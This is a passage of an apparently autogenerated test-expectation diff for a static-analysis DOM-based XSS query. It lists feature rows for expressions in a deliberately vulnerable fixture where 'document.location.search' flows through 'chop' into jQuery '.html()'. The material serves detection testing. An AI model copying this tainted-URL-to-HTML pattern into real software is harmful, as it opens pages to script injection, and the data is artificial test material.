element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:54:3:54:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:54:3:54:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:11:54:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:11:54:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:11:54:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:19 | chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:19 | chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:19 | chop | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | chop(do ... search) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | chop(do ... search) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | chop(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | chop(do ... search) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | chop(do ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | exceptional return of chop(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | exceptional return of chop(do ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:16:54:45 | exceptional return of chop(do ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:28 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:28 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:28 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:37 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:37 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:37 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:44 | documen ... .search | CalleeFlexibleAccessPath | chop | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:44 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:44 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:44 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:21:54:44 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:30:54:37 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:30:54:37 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:30:54:37 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:39:54:44 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:39:54:44 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:39:54:44 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | $('myId ... earch)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | exceptional return of $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | exceptional return of $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:1:56:46 | exceptional return of $('myId ... earch)) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:56:3:56:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:56:3:56:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:56:3:56:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:56:3:56:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:56:3:56:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:11:56:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:11:56:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:11:56:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:19 | chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:19 | chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:19 | chop | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | chop(do ... search) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | chop(do ... search) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | chop(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | chop(do ... search) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | chop(do ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | exceptional return of chop(do ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | exceptional return of chop(do ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:16:56:45 | exceptional return of chop(do ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:28 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:28 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:28 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:37 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:37 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:37 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:44 | documen ... .search | CalleeFlexibleAccessPath | chop | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:44 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:44 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:44 | documen ... .search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:21:56:44 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:30:56:37 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:30:56:37 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:30:56:37 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:56:39:56:44 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:56:39:56:44 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:56:39:56:44 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 